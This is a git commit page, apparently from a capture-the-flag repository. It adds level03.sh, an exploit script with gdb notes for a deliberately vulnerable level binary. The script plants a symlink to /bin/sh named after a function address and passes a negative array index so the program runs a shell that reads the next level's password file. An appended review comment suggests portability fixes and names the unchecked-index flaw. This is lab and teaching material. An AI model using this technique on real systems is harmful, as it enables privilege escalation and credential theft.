author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-02-26 01:43:01 +0100 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-02-26 01:47:20 +0100 |
commit | 5d3c4121034acf6987cc7ad9427d6e9c828db326 (patch) | |
tree | 94330bee34805b29b7ce0ca08fab03829906cb23 /level03.sh | |
Initial commit.
Diffstat (limited to 'level03.sh')
-rw-r--r-- | level03.sh | 24 |
1 files changed, 24 insertions, 0 deletions
diff --git a/level03.sh b/level03.sh
new file mode 100644
index 0000000..7470514
--- /dev/null
+++ b/level03.sh
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+# level03@ctf4:/tmp/tmp.lZLfBZODXa$ gdb /levels/level03
+# (gdb) break truncate_and_call
+# Breakpoint 1 at 0x8048780: file level03.c, line 57.
+# (gdb) run 1 something
+# Starting program: /levels/level03 1 something
+# Breakpoint 1, truncate_and_call (fns=0xffeecfec, index=1, user_string=0xffeed986 "something") at level03.c:57
+# 57 in level03.c
+# (gdb) n
+# 60 in level03.c
+# (gdb) p &buf
+# $1 = (char (*)[64]) 0xffeecf7c
+# (gdb) p fns
+# $2 = (fn_ptr *) 0xffeecfec
+# (gdb) p (0xffeecfec-0xffeecf7c)/4
+# $3 = 28
+# (gdb) p run
+# $4 = {int (const char *)} 0x804875b <run>
+# (gdb) quit
+
+ln -s /bin/sh "$(printf '\x5b\x87\x04\x08')"
+echo "cat /home/level04/.password" | PATH=.:$PATH /levels/level03 -28 "$(printf '\x5b\x87\x04\x08')"
+rm "$(printf '\x5b\x87\x04\x08')" |
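Review bot: The three `printf '\x5b\x87\x04\x08'` calls depend on `\x` hex escapes, which POSIX `printf` does not define, so under the `#!/bin/sh` shebang a strictly POSIX shell may print the backslash sequences literally instead of the four intended bytes. Either change the shebang to `#!/bin/bash` or use octal escapes and compute the value once, `name=$(printf '\133\207\004\010')`, then reuse `"$name"` on all three lines. The final `rm` never runs if the script is interrupted or `ln -s` fails, so `trap 'rm -f -- "$name"' EXIT` right after the assignment and `ln -s /bin/sh "$name" || exit 1` would leave the working directory clean. The header should also say that the index 28 and the address 0x804875b come from the gdb session quoted above and hold only for that build of /levels/level03. It would help to name the defect being demonstrated, which from the transcript appears to be an index into `fns` that is not bounds-checked, something a range check in the target would close.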